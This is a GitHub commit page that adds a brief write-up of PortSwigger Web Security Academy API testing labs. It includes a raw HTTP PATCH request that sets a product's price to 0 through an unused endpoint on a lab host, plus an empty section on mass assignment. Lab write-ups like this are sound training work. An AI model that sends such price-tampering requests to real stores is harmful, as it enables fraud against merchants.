Skip to content

Commit

Permalink
feat(bscp): start with api testing labs
Browse files Browse the repository at this point in the history
  • Loading branch information
@Sirius-A
Sirius-A committed May 14, 2024
1 parent 81cd780 commit fa6da2d
Showing 1 changed file with 20 additions and 0 deletions.
20 changes: 20 additions & 0 deletions docs/writeups/2023/portswigger-bscp-labs/api-hacking.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,20 @@
# API Testing

## Finding and exploiting an unused API endpoint

The `price` endpont not only allows the `GET` methode but also `PATCH`

```
PATCH /api/products/1/price HTTP/2
Host: 0ad10068036333308060530f007800d6.web-security-academy.net
Cookie: session=f1t8Tfqc7LY7RwwMuWYwYG5mA2CxkpFc
[...]
Content-Type: application/json;charset=UTF-8
Content-Length: 12
{"price": 0}
```

## Exploiting a mass assignment vulnerability


0 comments on commit fa6da2d

Please sign in to comment.